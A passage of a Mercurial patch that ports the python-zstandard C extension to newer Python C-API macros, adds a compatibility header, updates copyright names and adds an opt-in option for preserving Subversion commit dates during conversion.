&PyType_Type; + Py_SET_TYPE(&ZstdBufferWithSegmentsType, &PyType_Type); if (PyType_Ready(&ZstdBufferWithSegmentsType) < 0) { return; } @@ -766,7 +766,7 @@ Py_INCREF(&ZstdBufferWithSegmentsType); PyModule_AddObject(mod, "BufferWithSegments", (PyObject*)&ZstdBufferWithSegmentsType); - Py_TYPE(&ZstdBufferSegmentsType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferSegmentsType, &PyType_Type); if (PyType_Ready(&ZstdBufferSegmentsType) < 0) { return; } @@ -774,7 +774,7 @@ Py_INCREF(&ZstdBufferSegmentsType); PyModule_AddObject(mod, "BufferSegments", (PyObject*)&ZstdBufferSegmentsType); - Py_TYPE(&ZstdBufferSegmentType) = &PyType_Type; + 
Py_SET_TYPE(&ZstdBufferSegmentType, &PyType_Type); if (PyType_Ready(&ZstdBufferSegmentType) < 0) { return; } @@ -782,7 +782,7 @@ Py_INCREF(&ZstdBufferSegmentType); PyModule_AddObject(mod, "BufferSegment", (PyObject*)&ZstdBufferSegmentType); - Py_TYPE(&ZstdBufferWithSegmentsCollectionType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferWithSegmentsCollectionType, &PyType_Type); if (PyType_Ready(&ZstdBufferWithSegmentsCollectionType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionchunker.c b/contrib/python-zstandard/c-ext/compressionchunker.c --- a/contrib/python-zstandard/c-ext/compressionchunker.c +++ b/contrib/python-zstandard/c-ext/compressionchunker.c @@ -348,12 +348,12 @@ }; void compressionchunker_module_init(PyObject* module) { - Py_TYPE(&ZstdCompressionChunkerIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionChunkerIteratorType, &PyType_Type); if (PyType_Ready(&ZstdCompressionChunkerIteratorType) < 0) { return; } - Py_TYPE(&ZstdCompressionChunkerType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionChunkerType, &PyType_Type); if (PyType_Ready(&ZstdCompressionChunkerType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressiondict.c b/contrib/python-zstandard/c-ext/compressiondict.c --- a/contrib/python-zstandard/c-ext/compressiondict.c +++ b/contrib/python-zstandard/c-ext/compressiondict.c @@ -400,7 +400,7 @@ }; void compressiondict_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionDictType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionDictType, &PyType_Type); if (PyType_Ready(&ZstdCompressionDictType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionparams.c b/contrib/python-zstandard/c-ext/compressionparams.c --- a/contrib/python-zstandard/c-ext/compressionparams.c +++ b/contrib/python-zstandard/c-ext/compressionparams.c @@ -556,7 +556,7 @@ }; void compressionparams_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionParametersType) = &PyType_Type; + 
Py_SET_TYPE(&ZstdCompressionParametersType, &PyType_Type); if (PyType_Ready(&ZstdCompressionParametersType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionreader.c b/contrib/python-zstandard/c-ext/compressionreader.c --- a/contrib/python-zstandard/c-ext/compressionreader.c +++ b/contrib/python-zstandard/c-ext/compressionreader.c @@ -811,7 +811,7 @@ void compressionreader_module_init(PyObject* mod) { /* TODO make reader a sub-class of io.RawIOBase */ - Py_TYPE(&ZstdCompressionReaderType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionReaderType, &PyType_Type); if (PyType_Ready(&ZstdCompressionReaderType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionwriter.c b/contrib/python-zstandard/c-ext/compressionwriter.c --- a/contrib/python-zstandard/c-ext/compressionwriter.c +++ b/contrib/python-zstandard/c-ext/compressionwriter.c @@ -365,7 +365,7 @@ }; void compressionwriter_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionWriterType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionWriterType, &PyType_Type); if (PyType_Ready(&ZstdCompressionWriterType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressobj.c b/contrib/python-zstandard/c-ext/compressobj.c --- a/contrib/python-zstandard/c-ext/compressobj.c +++ b/contrib/python-zstandard/c-ext/compressobj.c @@ -249,7 +249,7 @@ }; void compressobj_module_init(PyObject* module) { - Py_TYPE(&ZstdCompressionObjType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionObjType, &PyType_Type); if (PyType_Ready(&ZstdCompressionObjType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressor.c b/contrib/python-zstandard/c-ext/compressor.c --- a/contrib/python-zstandard/c-ext/compressor.c +++ b/contrib/python-zstandard/c-ext/compressor.c @@ -619,7 +619,7 @@ goto finally; } - Py_SIZE(output) = outBuffer.pos; + Py_SET_SIZE(output, outBuffer.pos); finally: PyBuffer_Release(&source); @@ -1659,7 +1659,7 @@ }; void compressor_module_init(PyObject* mod) { - 
Py_TYPE(&ZstdCompressorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressorType, &PyType_Type); if (PyType_Ready(&ZstdCompressorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressoriterator.c b/contrib/python-zstandard/c-ext/compressoriterator.c --- a/contrib/python-zstandard/c-ext/compressoriterator.c +++ b/contrib/python-zstandard/c-ext/compressoriterator.c @@ -228,7 +228,7 @@ }; void compressoriterator_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressorIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressorIteratorType, &PyType_Type); if (PyType_Ready(&ZstdCompressorIteratorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressionreader.c b/contrib/python-zstandard/c-ext/decompressionreader.c --- a/contrib/python-zstandard/c-ext/decompressionreader.c +++ b/contrib/python-zstandard/c-ext/decompressionreader.c @@ -774,7 +774,7 @@ void decompressionreader_module_init(PyObject* mod) { /* TODO make reader a sub-class of io.RawIOBase */ - Py_TYPE(&ZstdDecompressionReaderType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionReaderType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionReaderType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressionwriter.c b/contrib/python-zstandard/c-ext/decompressionwriter.c --- a/contrib/python-zstandard/c-ext/decompressionwriter.c +++ b/contrib/python-zstandard/c-ext/decompressionwriter.c @@ -288,7 +288,7 @@ }; void decompressionwriter_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressionWriterType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionWriterType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionWriterType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressobj.c b/contrib/python-zstandard/c-ext/decompressobj.c --- a/contrib/python-zstandard/c-ext/decompressobj.c +++ b/contrib/python-zstandard/c-ext/decompressobj.c @@ -195,7 +195,7 @@ }; void decompressobj_module_init(PyObject* module) { - 
Py_TYPE(&ZstdDecompressionObjType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionObjType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionObjType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressor.c b/contrib/python-zstandard/c-ext/decompressor.c --- a/contrib/python-zstandard/c-ext/decompressor.c +++ b/contrib/python-zstandard/c-ext/decompressor.c @@ -1811,7 +1811,7 @@ }; void decompressor_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressorType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressorType, &PyType_Type); if (PyType_Ready(&ZstdDecompressorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressoriterator.c b/contrib/python-zstandard/c-ext/decompressoriterator.c --- a/contrib/python-zstandard/c-ext/decompressoriterator.c +++ b/contrib/python-zstandard/c-ext/decompressoriterator.c @@ -242,7 +242,7 @@ }; void decompressoriterator_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressorIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressorIteratorType, &PyType_Type); if (PyType_Ready(&ZstdDecompressorIteratorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/frameparams.c b/contrib/python-zstandard/c-ext/frameparams.c --- a/contrib/python-zstandard/c-ext/frameparams.c +++ b/contrib/python-zstandard/c-ext/frameparams.c @@ -128,7 +128,7 @@ }; void frameparams_module_init(PyObject* mod) { - Py_TYPE(&FrameParametersType) = &PyType_Type; + Py_SET_TYPE(&FrameParametersType, &PyType_Type); if (PyType_Ready(&FrameParametersType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/python-zstandard.h b/contrib/python-zstandard/c-ext/python-zstandard.h --- a/contrib/python-zstandard/c-ext/python-zstandard.h +++ b/contrib/python-zstandard/c-ext/python-zstandard.h @@ -9,6 +9,7 @@ #define PY_SSIZE_T_CLEAN #include <Python.h> #include "structmember.h" +#include <pythoncapi_compat.h> #define ZSTD_STATIC_LINKING_ONLY #define ZDICT_STATIC_LINKING_ONLY diff --git 
a/contrib/python-zstandard/zstd/common/pythoncapi_compat.h b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h new file mode 100644 --- /dev/null +++ b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h @@ -0,0 +1,283 @@ +// Header file providing new functions of the Python C API to old Python +// versions. +// +// File distributed under the MIT license. +// +// Homepage: +// https://github.com/pythoncapi/pythoncapi_compat +// +// Latest version: +// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h + +#ifndef PYTHONCAPI_COMPAT +#define PYTHONCAPI_COMPAT + +#ifdef __cplusplus +extern "C" { +#endif + +#include <Python.h> +#include "frameobject.h" // PyFrameObject, PyFrame_GetBack() + + +/* VC 2008 doesn't know about the inline keyword. */ +#if defined(_MSC_VER) && _MSC_VER < 1900 +#define inline __forceinline +#endif + +// Cast argument to PyObject* type. +#ifndef _PyObject_CAST +# define _PyObject_CAST(op) ((PyObject*)(op)) +#endif + + +// bpo-42262 added Py_NewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef) +static inline PyObject* _Py_NewRef(PyObject *obj) +{ + Py_INCREF(obj); + return obj; +} +#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-42262 added Py_XNewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef) +static inline PyObject* _Py_XNewRef(PyObject *obj) +{ + Py_XINCREF(obj); + return obj; +} +#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT) +static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt) +{ + ob->ob_refcnt = refcnt; +} +#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt) +#endif + + +// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE) +static inline void +_Py_SET_TYPE(PyObject *ob, 
PyTypeObject *type) +{ + ob->ob_type = type; +} +#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type) +#endif + + +// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE) +static inline void +_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size) +{ + ob->ob_size = size; +} +#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size) +#endif + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyCodeObject* +PyFrame_GetCode(PyFrameObject *frame) +{ + PyCodeObject *code; + assert(frame != NULL); + code = frame->f_code; + assert(code != NULL); + Py_INCREF(code); + return code; +} +#endif + +static inline PyCodeObject* +_PyFrame_GetCodeBorrow(PyFrameObject *frame) +{ + PyCodeObject *code = PyFrame_GetCode(frame); + Py_DECREF(code); + return code; // borrowed reference +} + + +// bpo-40421 added PyFrame_GetBack() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyFrame_GetBack(PyFrameObject *frame) +{ + PyFrameObject *back; + assert(frame != NULL); + back = frame->f_back; + Py_XINCREF(back); + return back; +} +#endif + +static inline PyFrameObject* +_PyFrame_GetBackBorrow(PyFrameObject *frame) +{ + PyFrameObject *back = PyFrame_GetBack(frame); + Py_XDECREF(back); + return back; // borrowed reference +} + + +// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyThreadState_GetInterpreter(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->interp; +} +#endif + + +// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyThreadState_GetFrame(PyThreadState *tstate) +{ + PyFrameObject *frame; + assert(tstate != NULL); + frame = tstate->frame; + Py_XINCREF(frame); + return frame; +} +#endif + +static inline PyFrameObject* 
+_PyThreadState_GetFrameBorrow(PyThreadState *tstate) +{ + PyFrameObject *frame = PyThreadState_GetFrame(tstate); + Py_XDECREF(frame); + return frame; // borrowed reference +} + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyInterpreterState_Get(void) +{ + PyThreadState *tstate; + PyInterpreterState *interp; + + tstate = PyThreadState_GET(); + if (tstate == NULL) { + Py_FatalError("GIL released (tstate is NULL)"); + } + interp = tstate->interp; + if (interp == NULL) { + Py_FatalError("no current interpreter"); + } + return interp; +} +#endif + + +// bpo-39947 added PyThreadState_GetID() to Python 3.9.0a6 +#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6 +static inline uint64_t +PyThreadState_GetID(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->id; +} +#endif + + +// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1 +#if PY_VERSION_HEX < 0x030900A1 +static inline PyObject* +PyObject_CallNoArgs(PyObject *func) +{ + return PyObject_CallFunctionObjArgs(func, NULL); +} +#endif + + +// bpo-39245 made PyObject_CallOneArg() public (previously called +// _PyObject_CallOneArg) in Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 +static inline PyObject* +PyObject_CallOneArg(PyObject *func, PyObject *arg) +{ + return PyObject_CallFunctionObjArgs(func, arg, NULL); +} +#endif + + +// bpo-40024 added PyModule_AddType() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline int +PyModule_AddType(PyObject *module, PyTypeObject *type) +{ + const char *name, *dot; + + if (PyType_Ready(type) < 0) { + return -1; + } + + // inline _PyType_Name() + name = type->tp_name; + assert(name != NULL); + dot = strrchr(name, '.'); + if (dot != NULL) { + name = dot + 1; + } + + Py_INCREF(type); + if (PyModule_AddObject(module, name, (PyObject *)type) < 0) { + Py_DECREF(type); + return -1; + } + + return 0; +} +#endif + + +// bpo-40241 added 
PyObject_GC_IsTracked() to Python 3.9.0a6. +// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2. +#if PY_VERSION_HEX < 0x030900A6 +static inline int +PyObject_GC_IsTracked(PyObject* obj) +{ + return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj)); +} +#endif + +// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6. +// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final. +#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0 +static inline int +PyObject_GC_IsFinalized(PyObject *obj) +{ + return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1)); +} +#endif + + +// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE) +static inline int +_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) { + return ob->ob_type == type; +} +#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type) +#endif + + +#ifdef __cplusplus +} +#endif +#endif // PYTHONCAPI_COMPAT diff --git a/contrib/win32/ReadMe.html b/contrib/win32/ReadMe.html --- a/contrib/win32/ReadMe.html +++ b/contrib/win32/ReadMe.html @@ -140,7 +140,7 @@ </p> <p> - Mercurial is Copyright 2005-2021 Matt Mackall and others. + Mercurial is Copyright 2005-2021 Olivia Mackall and others. </p> <p> diff --git a/contrib/win32/hg.bat b/contrib/win32/hg.bat --- a/contrib/win32/hg.bat +++ b/contrib/win32/hg.bat @@ -4,6 +4,8 @@ setlocal set HG=%~f0 +set PYTHONLEGACYWINDOWSSTDIO=1 + rem Use a full path to Python (relative to this script) if it exists, rem as the standard Python install does not put python.exe on the PATH... rem Otherwise, expect that python.exe can be found on the PATH. diff --git a/doc/Makefile b/doc/Makefile --- a/doc/Makefile +++ b/doc/Makefile @@ -6,7 +6,14 @@ PREFIX=/usr/local MANDIR=$(PREFIX)/share/man INSTALL=install -m 644 -PYTHON?=python +# Default to Python 3. +# +# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is. 
+ifeq ($(OS),Windows_NT) +PYTHON?=py -3 +else +PYTHON?=python3 +endif RSTARGS= export HGENCODING=UTF-8 diff --git a/doc/gendoc.py b/doc/gendoc.py --- a/doc/gendoc.py +++ b/doc/gendoc.py @@ -31,6 +31,7 @@ commands, encoding, extensions, + fancyopts, help, minirst, pycompat, @@ -86,6 +87,8 @@ if b'\n' in desc: # only remove line breaks and indentation desc = b' '.join(l.lstrip() for l in desc.split(b'\n')) + if isinstance(default, fancyopts.customopt): + default = default.getdefaultvalue() if default: default = stringutil.forcebytestr(default) desc += _(b" (default: %s)") % default @@ -314,7 +317,12 @@ ui.write(b"\n") # aliases if d[b'aliases']: - ui.write(_(b" aliases: %s\n\n") % b" ".join(d[b'aliases'])) + # Note the empty comment, this is required to separate this + # (which should be a blockquote) from any preceding things (such + # as a definition list). + ui.write( + _(b"..\n\n aliases: %s\n\n") % b" ".join(d[b'aliases']) + ) def allextensionnames(): @@ -327,6 +335,11 @@ doc = encoding.strtolocal(sys.argv[1]) ui = uimod.ui.load() + # Trigger extensions to load. This is disabled by default because it uses + # the current user's configuration, which is often not what is wanted. + if encoding.environ.get(b'GENDOC_LOAD_CONFIGURED_EXTENSIONS', b'0') != b'0': + extensions.loadall(ui) + if doc == b'hg.1.gendoc': showdoc(ui) else: diff --git a/doc/runrst b/doc/runrst --- a/doc/runrst +++ b/doc/runrst @@ -2,7 +2,7 @@ # # runrst - register custom roles and run correct writer # -# Copyright 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright 2010 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/hg b/hg --- a/hg +++ b/hg @@ -2,7 +2,7 @@ # # mercurial - scalable distributed SCM # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgdemandimport/demandimportpy2.py b/hgdemandimport/demandimportpy2.py --- a/hgdemandimport/demandimportpy2.py +++ b/hgdemandimport/demandimportpy2.py @@ -1,6 +1,6 @@ # demandimport.py - global demand-loading of modules for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/absorb.py b/hgext/absorb.py --- a/hgext/absorb.py +++ b/hgext/absorb.py @@ -102,6 +102,9 @@ class emptyfilecontext(object): """minimal filecontext representing an empty file""" + def __init__(self, repo): + self._repo = repo + def data(self): return b'' @@ -212,7 +215,7 @@ if path in pctx: fctxs.append(pctx[path]) else: - fctxs.append(emptyfilecontext()) + fctxs.append(emptyfilecontext(pctx.repo())) fctxs.reverse() # note: we rely on a property of hg: filerev is not reused for linear diff --git a/hgext/blackbox.py b/hgext/blackbox.py --- a/hgext/blackbox.py +++ b/hgext/blackbox.py @@ -38,7 +38,7 @@ [blackbox] # Include nanoseconds in log entries with %f (see Python function # datetime.datetime.strftime) - date-format = '%Y-%m-%d @ %H:%M:%S.%f' + date-format = %Y-%m-%d @ %H:%M:%S.%f """ diff --git a/hgext/churn.py b/hgext/churn.py --- a/hgext/churn.py +++ b/hgext/churn.py @@ -38,11 +38,16 @@ def changedlines(ui, repo, ctx1, ctx2, fmatch): added, removed = 0, 0 diff = b''.join(patch.diff(repo, ctx1.node(), ctx2.node(), fmatch)) + inhunk = False for l in diff.split(b'\n'): - if l.startswith(b"+") and not 
l.startswith(b"+++ "): + if inhunk and l.startswith(b"+"): added += 1 - elif l.startswith(b"-") and not l.startswith(b"--- "): + elif inhunk and l.startswith(b"-"): removed += 1 + elif l.startswith(b"@"): + inhunk = True + elif l.startswith(b"d"): + inhunk = False return (added, removed) diff --git a/hgext/convert/__init__.py b/hgext/convert/__init__.py --- a/hgext/convert/__init__.py +++ b/hgext/convert/__init__.py @@ -1,6 +1,6 @@ # convert.py Foreign SCM converter # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -491,6 +491,22 @@ :convert.skiptags: does not convert tags from the source repo to the target repo. The default is False. + + Subversion Destination + ###################### + + Original commit dates are not preserved by default. + + :convert.svn.dangerous-set-commit-dates: preserve original commit dates, + forcefully setting ``svn:date`` revision properties. This option is + DANGEROUS and may break some subversion functionality for the resulting + repository (e.g. filtering revisions with date ranges in ``svn log``), + as original commit dates are not guaranteed to be monotonically + increasing. + + For commit dates setting to work destination repository must have + ``pre-revprop-change`` hook configured to allow setting of ``svn:date`` + revision properties. See Subversion documentation for more details. 
""" return convcmd.convert(ui, src, dest, revmapfile, **opts) diff --git a/hgext/convert/common.py b/hgext/convert/common.py --- a/hgext/convert/common.py +++ b/hgext/convert/common.py @@ -1,6 +1,6 @@ # common.py - common code for the convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/convcmd.py b/hgext/convert/convcmd.py --- a/hgext/convert/convcmd.py +++ b/hgext/convert/convcmd.py @@ -1,6 +1,6 @@ # convcmd - convert extension commands definition # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/cvs.py b/hgext/convert/cvs.py --- a/hgext/convert/cvs.py +++ b/hgext/convert/cvs.py @@ -1,6 +1,6 @@ # cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/darcs.py b/hgext/convert/darcs.py --- a/hgext/convert/darcs.py +++ b/hgext/convert/darcs.py @@ -1,6 +1,6 @@ # darcs.py - darcs support for the convert extension # -# Copyright 2007-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2007-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/hgext/convert/git.py b/hgext/convert/git.py --- a/hgext/convert/git.py +++ b/hgext/convert/git.py @@ -1,6 +1,6 @@ # git.py - git support for the convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -247,7 +247,8 @@ b'\n'.join(line.strip() for line in content.split(b'\n')), ) for sec in c.sections(): - s = c[sec] + # turn the config object into a real dict + s = dict(c.items(sec)) if b'url' in s and b'path' in s: self.submodules.append(submodule(s[b'path'], b'', s[b'url'])) diff --git a/hgext/convert/hg.py b/hgext/convert/hg.py --- a/hgext/convert/hg.py +++ b/hgext/convert/hg.py @@ -1,6 +1,6 @@ # hg.py - hg backend for convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/subversion.py b/hgext/convert/subversion.py --- a/hgext/convert/subversion.py +++ b/hgext/convert/subversion.py @@ -97,6 +97,17 @@ return s.decode(fsencoding).encode('utf-8') +def formatsvndate(date): + return dateutil.datestr(date, b'%Y-%m-%dT%H:%M:%S.000000Z') + + +def parsesvndate(s): + # Example SVN datetime. Includes microseconds. + # ISO-8601 conformant + # '2007-01-04T17:35:00.902377Z' + return dateutil.parsedate(s[:19] + b' UTC', [b'%Y-%m-%dT%H:%M:%S']) + + class SvnPathNotFound(Exception): pass @@ -1158,12 +1169,7 @@ continue paths.append((path, ent)) - # Example SVN datetime. Includes microseconds. 
- # ISO-8601 conformant - # '2007-01-04T17:35:00.902377Z' - date = dateutil.parsedate( - date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"] - ) + date = parsesvndate(date) if self.ui.configbool(b'convert', b'localtimezone'): date = makedatetimestamp(date[0]) @@ -1380,7 +1386,7 @@ return logstream(stdout) -pre_revprop_change = b'''#!/bin/sh +pre_revprop_change_template = b'''#!/bin/sh REPOS="$1" REV="$2" @@ -1388,15 +1394,26 @@ PROPNAME="$4" ACTION="$5" -if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi -if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi -if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi +%(rules)s echo "Changing prohibited revision property" >&2 exit 1 ''' +def gen_pre_revprop_change_hook(prop_actions_allowed): + rules = [] + for action, propname in prop_actions_allowed: + rules.append( + ( + b'if [ "$ACTION" = "%s" -a "$PROPNAME" = "%s" ]; ' + b'then exit 0; fi' + ) + % (action, propname) + ) + return pre_revprop_change_template % {b'rules': b'\n'.join(rules)} + + class svn_sink(converter_sink, commandline): commit_re = re.compile(br'Committed revision (\d+).', re.M) uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M) @@ -1470,9 +1487,20 @@ self.is_exec = None if created: + prop_actions_allowed = [ + (b'M', b'svn:log'), + (b'A', b'hg:convert-branch'), + (b'A', b'hg:convert-rev'), + ] + + if self.ui.configbool( + b'convert', b'svn.dangerous-set-commit-dates' + ): + prop_actions_allowed.append((b'M', b'svn:date')) + hook = os.path.join(created, b'hooks', b'pre-revprop-change') fp = open(hook, b'wb') - fp.write(pre_revprop_change) + fp.write(gen_pre_revprop_change_hook(prop_actions_allowed)) fp.close() util.setflags(hook, False, True) @@ -1667,6 +1695,23 @@ revprop=True, revision=rev, ) + + if self.ui.configbool( + b'convert', b'svn.dangerous-set-commit-dates' + ): + # Subversion always uses UTC to represent date and time + date = dateutil.parsedate(commit.date) + date = (date[0], 0) + 
# The only way to set date and time for svn commit is to use propset after commit is done + self.run( + b'propset', + b'svn:date', + formatsvndate(date), + revprop=True, + revision=rev, + ) + for parent in parents: self.addchild(parent, rev) return self.revid(rev) diff --git a/hgext/extdiff.py b/hgext/extdiff.py --- a/hgext/extdiff.py +++ b/hgext/extdiff.py @@ -91,7 +91,7 @@ from mercurial.i18n import _ from mercurial.node import ( - nullid, + nullrev, short, ) from mercurial import ( @@ -565,18 +565,18 @@ repo, [from_rev] + [to_rev], b'nowarn' ) ctx1a = scmutil.revsingle(repo, from_rev, None) - ctx1b = repo[nullid] + ctx1b = repo[nullrev] ctx2 = scmutil.revsingle(repo, to_rev, None) else: ctx1a, ctx2 = scmutil.revpair(repo, revs) if not revs: ctx1b = repo[None].p2() else: - ctx1b = repo[nullid] + ctx1b = repo[nullrev] # Disable 3-way merge if there is only one parent if do3way: - if ctx1b.node() == nullid: + if ctx1b.rev() == nullrev: do3way = False matcher = scmutil.match(ctx2, pats, opts) diff --git a/hgext/fastannotate/protocol.py b/hgext/fastannotate/protocol.py --- a/hgext/fastannotate/protocol.py +++ b/hgext/fastannotate/protocol.py @@ -20,6 +20,9 @@ wireprotov1peer, wireprotov1server, ) +from mercurial.utils import ( + urlutil, +) from . 
